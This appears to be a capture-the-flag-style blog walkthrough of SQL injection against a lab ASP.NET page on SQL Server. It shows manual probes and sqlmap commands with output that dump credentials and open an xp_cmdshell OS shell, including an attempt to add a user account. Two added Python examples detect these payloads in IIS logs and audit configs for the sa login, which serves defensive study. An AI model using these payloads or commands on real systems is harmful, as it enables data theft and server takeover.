
5号黯区 WEB Range - Injection Vulnerabilities - SQL Server GET Injection (sa)

Posted: 2022-12-29 17:00:41  Views: 52
Tags: sqlmap WEB get 8201 CHAR aspx id injection

1 Manual injection

1. Check whether the parameter is injectable.

Appending a single quote produces a database error, so error-based injection is present.

http://bug.cc:8201/get.aspx?id=1'

Appending and 1=1 displays the page normally, while and 1=2 returns no data, so boolean-based injection is present.

http://bug.cc:8201/get.aspx?id=1 and 1=1

Appending / displays normally; appending -0 displays an error.

2. Identify the database type: if the following condition still displays the page normally, the backend is MSSQL (SQL Server). and (select count(*) from sysobjects)>0

http://bug.cc:8201/get.aspx?id=1 and (select count(*) from sysobjects)>0 

3. Determine the number of columns with order by 4; trying successive values shows the query has 4 columns.

http://bug.cc:8201/get.aspx?id=1 order by 4

4.

 

2 Tool-based injection

2.1 sqlmap

The procedure is as follows:

1. Test the injection point: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1'

2. Get the current database: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --current-db

3. Get the current user: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --current-user

4. Check for DBA privileges: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --is-dba

5. List the tables in the database: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' -D test --tables

6. List the columns of a table: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' -D test -T users --columns

7. Dump table data: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' -D test -T users -C name,password --dump

8. Execute OS commands: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --os-shell

 

1. Test the injection point: sqlmap -u "http://192.168.5.186:8201/get.aspx?id=1"

The output is as follows:

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 9842=9842

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=1;WAITFOR DELAY '0:0:5'--

    Type: time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF)
    Payload: id=1 WAITFOR DELAY '0:0:5'

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=1 UNION ALL SELECT NULL,CHAR(113)+CHAR(112)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(111)+CHAR(119)+CHAR(122)+CHAR(109)+CHAR(83)+CHAR(70)+CHAR(74)+CHAR(121)+CHAR(111)+CHAR(99)+CHAR(71)+CHAR(121)+CHAR(79)+CHAR(90)+CHAR(65)+CHAR(87)+CHAR(89)+CHAR(102)+CHAR(82)+CHAR(83)+CHAR(120)+CHAR(99)+CHAR(65)+CHAR(104)+CHAR(119)+CHAR(82)+CHAR(107)+CHAR(82)+CHAR(112)+CHAR(120)+CHAR(68)+CHAR(68)+CHAR(97)+CHAR(97)+CHAR(81)+CHAR(112)+CHAR(88)+CHAR(98)+CHAR(113)+CHAR(77)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(106)+CHAR(113),NULL,NULL-- ouYA
---
[03:08:54] [INFO] testing Microsoft SQL Server
[03:08:55] [INFO] confirming Microsoft SQL Server
[03:08:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 7 or 2008 R2
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
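The probes in the manual section (single quote, and 1=1 / and 1=2, sysobjects, order by) and the payload classes sqlmap reports above (WAITFOR DELAY, UNION ALL SELECT with CHAR() concatenation, and xp_cmdshell later in the --os-shell run) all travel in the id query string, so they are visible in the IIS W3C access log. The following is an added example for this post, not code from the original article or from the sqlmap project: a small Python detector over constructed IIS log lines (the log lines, the client addresses 192.168.5.10 and 192.168.5.11, and the indicator labels are assumptions made for the example). It URL-decodes cs-uri-query, labels each request with the indicator classes it matches, and then aggregates per client, because a single quote in a legitimate value such as O'Brien is noise, while one client tripping several distinct classes in sequence is the signature of an injection run.

```python
import re
from urllib.parse import unquote, unquote_plus

# Indicator classes matching the probes and payloads seen in this walkthrough.
# The labels are chosen for this example; they are not sqlmap or IIS terminology.
INDICATORS = {
    "quote-probe":       re.compile(r"'"),
    "boolean-probe":     re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),
    "mssql-fingerprint": re.compile(r"\bsysobjects\b", re.I),
    "column-count":      re.compile(r"\border\s+by\s+\d+", re.I),
    "time-based":        re.compile(r"\bwaitfor\s+delay\b", re.I),
    "union-select":      re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "char-concat":       re.compile(r"(?:char\(\d+\)\s*\+\s*){3,}", re.I),
    "xp_cmdshell":       re.compile(r"\bxp_cmdshell\b", re.I),
}

# Constructed IIS 7.5 W3C log excerpt (not taken from the lab host). Client
# 192.168.5.10 replays the probe sequence from the post; 192.168.5.11 is a
# normal user whose search term happens to contain an apostrophe.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2022-12-29 03:08:50 192.168.5.186 GET /get.aspx id=1 8201 192.168.5.10 200
2022-12-29 03:08:51 192.168.5.186 GET /get.aspx id=1%27 8201 192.168.5.10 500
2022-12-29 03:08:52 192.168.5.186 GET /get.aspx id=1+and+1%3D2 8201 192.168.5.10 200
2022-12-29 03:08:53 192.168.5.186 GET /get.aspx id=1+and+(select+count(*)+from+sysobjects)%3E0 8201 192.168.5.10 200
2022-12-29 03:08:54 192.168.5.186 GET /get.aspx id=1+order+by+4 8201 192.168.5.10 200
2022-12-29 03:08:55 192.168.5.186 GET /get.aspx id=1;WAITFOR+DELAY+%270:0:5%27-- 8201 192.168.5.10 200
2022-12-29 03:08:56 192.168.5.186 GET /get.aspx id=1+UNION+ALL+SELECT+NULL,CHAR(113)%2BCHAR(112)%2BCHAR(106)%2BCHAR(112),NULL,NULL-- 8201 192.168.5.10 200
2022-12-29 03:21:13 192.168.5.186 GET /get.aspx id=1;exec+xp_cmdshell+%27whoami%27-- 8201 192.168.5.10 200
2022-12-29 03:22:00 192.168.5.186 GET /search.aspx q=O%27Brien 8201 192.168.5.11 200
2022-12-29 03:22:01 192.168.5.186 GET /index.aspx - 8201 192.168.5.11 200
""".splitlines()


def parse_iis_w3c(lines):
    """Yield one dict per request line, keyed by the most recent #Fields header."""
    fields = None
    for line in lines:
        line = line.rstrip("\n")
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or fields is None:
            continue  # other directives, or data before any header
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed or truncated line; skip rather than misalign columns
        yield dict(zip(fields, values))


def classify_query(raw_query):
    """Return the sorted indicator labels present in one cs-uri-query value."""
    if raw_query in ("", "-"):
        return []
    # First pass turns '+' into space and %XX into bytes; the second pass (unquote,
    # which leaves '+' alone) catches double-encoded payloads such as %2527.
    decoded = unquote(unquote_plus(raw_query))
    return sorted(label for label, rx in INDICATORS.items() if rx.search(decoded))


def scan_log(lines):
    """Return (record, labels) for every request carrying at least one indicator."""
    hits = []
    for rec in parse_iis_w3c(lines):
        labels = classify_query(rec.get("cs-uri-query", "-"))
        if labels:
            hits.append((rec, labels))
    return hits


def suspicious_clients(hits, min_distinct=3):
    """Group indicator labels per client IP and keep clients that trip at least
    min_distinct distinct classes; a lone quote in a real value does not qualify."""
    per_client = {}
    for rec, labels in hits:
        per_client.setdefault(rec["c-ip"], set()).update(labels)
    return {ip: sorted(lbls) for ip, lbls in per_client.items() if len(lbls) >= min_distinct}


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for rec, labels in hits:
        print(rec["time"], rec["c-ip"], rec["cs-uri-stem"], ",".join(labels))
    print("flagged clients:", suspicious_clients(hits))
```

To run it over a real log, pass the file's lines to scan_log; min_distinct is the knob for how noisy the site's legitimate traffic is, and the 500 status on the quote probe is a second signal worth correlating, since it is the error page that told the author the parameter was injectable.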

2. Get the current database: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --current-db

current database: 'test'

3. Get the current user: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --current-user

current user: 'sa'

4. Check for DBA privileges: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --is-dba

current user is DBA: True

5. List the tables in the database: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' -D test --tables

Database: test
[3 tables]
+--------------+
| cmd |
| sqlmapoutput |
| users |
+--------------+

6. List the columns of a table: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' -D test -T users --columns

Database: test
Table: users
[4 columns]
+----------+---------+
| Column | Type |
+----------+---------+
| age | int |
| id | int |
| name | varchar |
| password | varchar |
+----------+---------+

7. Dump table data: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' -D test -T users -C name,password --dump

Database: test
Table: users
[2 entries]
+--------+----------+
| name | password |
+--------+----------+
| admin1 | admin2 |
| admin2 | admin2 |
+--------+----------+

8. Execute OS commands: sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --os-shell

└─# sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --os-shell
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.6.7#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:21:03 /2022-12-29/

[03:21:03] [INFO] resuming back-end DBMS 'microsoft sql server'
[03:21:03] [INFO] testing connection to the target URL
[03:21:04] [INFO] heuristics detected web page charset 'utf-8'
[03:21:04] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 9842=9842

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=1;WAITFOR DELAY '0:0:5'--

    Type: time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF)
    Payload: id=1 WAITFOR DELAY '0:0:5'

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=1 UNION ALL SELECT NULL,CHAR(113)+CHAR(112)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(111)+CHAR(119)+CHAR(122)+CHAR(109)+CHAR(83)+CHAR(70)+CHAR(74)+CHAR(121)+CHAR(111)+CHAR(99)+CHAR(71)+CHAR(121)+CHAR(79)+CHAR(90)+CHAR(65)+CHAR(87)+CHAR(89)+CHAR(102)+CHAR(82)+CHAR(83)+CHAR(120)+CHAR(99)+CHAR(65)+CHAR(104)+CHAR(119)+CHAR(82)+CHAR(107)+CHAR(82)+CHAR(112)+CHAR(120)+CHAR(68)+CHAR(68)+CHAR(97)+CHAR(97)+CHAR(81)+CHAR(112)+CHAR(88)+CHAR(98)+CHAR(113)+CHAR(77)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(106)+CHAR(113),NULL,NULL-- ouYA
---
[03:21:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[03:21:04] [WARNING] reflective value(s) found and filtering out
[03:21:04] [INFO] testing if current user is DBA
[03:21:04] [INFO] checking if xp_cmdshell extended procedure is available, please wait..
[03:21:13] [INFO] xp_cmdshell extended procedure is available
[03:21:13] [INFO] testing if xp_cmdshell extended procedure is usable
[03:21:13] [INFO] xp_cmdshell extended procedure is usable
[03:21:13] [INFO] going to use extended procedure 'xp_cmdshell' for operating system command execution
[03:21:13] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a]
command standard output: 'nt authority\network service'
os-shell> net user
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
\\ 的用户帐户

-------------------------------------------------------------------------------
Administrator            Guest
命令运行完毕,但发生一个或多个错误。

---
os-shell> net user test 123.com /add
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
发生系统错误 5。

拒绝访问。

---
os-shell>
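The sqlmap output above shows the lab application connecting as 'sa' (current user is DBA: True), which is why xp_cmdshell was usable for operating system command execution: an injected query inherits every privilege of the login the application uses. The added example below is not code from the original post or from the lab; it audits an ASP.NET web.config for that condition by parsing the connectionStrings section, normalising the SqlClient keyword aliases (User ID/uid/user, Password/pwd, Integrated Security/Trusted_Connection) and flagging a sysadmin login, an empty password and plaintext credentials. The web.config content, the connection names and the password value are constructed for the example.

```python
import xml.etree.ElementTree as ET

# Constructed web.config for illustration; not the lab application's real config.
SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <connectionStrings>
    <add name="LabDb"
         connectionString="Server=.\\SQLEXPRESS;Database=test;User ID=sa;Password=Passw0rd!"
         providerName="System.Data.SqlClient" />
    <add name="ReportsDb"
         connectionString="Data Source=db01;Initial Catalog=reports;Integrated Security=SSPI"
         providerName="System.Data.SqlClient" />
    <add name="LegacyDb"
         connectionString="Server=db02;Database=legacy;uid=dbo_user;pwd="
         providerName="System.Data.SqlClient" />
  </connectionStrings>
</configuration>
"""

# SqlClient accepts several spellings for the same keyword; map them to one form.
ALIASES = {
    "user id": "user id", "uid": "user id", "user": "user id",
    "password": "password", "pwd": "password",
    "integrated security": "integrated security",
    "trusted_connection": "integrated security",
}

# Logins that are sysadmin by definition; extend with site-specific admin logins.
HIGH_PRIV_LOGINS = {"sa"}


def parse_connection_string(cs):
    """Split 'key=value;key=value' into a dict with aliases normalised and keys lower-cased."""
    out = {}
    for part in cs.split(";"):
        if "=" not in part:
            continue
        key, value = part.split("=", 1)
        key = key.strip().lower()
        out[ALIASES.get(key, key)] = value.strip()
    return out


def audit_connection_string(name, cs):
    """Return a list of (severity, message) findings for one connection string."""
    kv = parse_connection_string(cs)
    findings = []
    integrated = kv.get("integrated security", "false").lower() in ("true", "sspi", "yes")
    login = kv.get("user id")
    if integrated:
        # Windows authentication: no SQL login or password lives in the file, but the
        # app pool identity's server roles still have to be checked on the SQL Server side.
        return findings
    if login is None:
        findings.append(("medium", f"{name}: no login and no integrated security"))
        return findings
    if login.lower() in HIGH_PRIV_LOGINS:
        findings.append(("high", f"{name}: application connects as '{login}' (sysadmin)"))
    if kv.get("password", "") == "":
        findings.append(("high", f"{name}: empty password for '{login}'"))
    else:
        findings.append(("low", f"{name}: plaintext password for '{login}' in config"))
    return findings


def audit_web_config(xml_text):
    """Audit every <add> under <connectionStrings> and return all findings in file order."""
    root = ET.fromstring(xml_text)
    findings = []
    for add in root.iterfind("./connectionStrings/add"):
        name = add.get("name", "?")
        findings.extend(audit_connection_string(name, add.get("connectionString", "")))
    return findings


if __name__ == "__main__":
    for severity, message in audit_web_config(SAMPLE_WEB_CONFIG):
        print(f"[{severity}] {message}")
```

The remediation the audit points at is the one this lab illustrates by its absence: a dedicated SQL login holding only the rights get.aspx needs, never sa, together with parameterised queries so that the id value is bound as data instead of concatenated into the statement. With least privilege in place, the --is-dba step reports False and the --os-shell step has nothing to call.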

 

From: https://www.cnblogs.com/snow2021/p/17012997.html
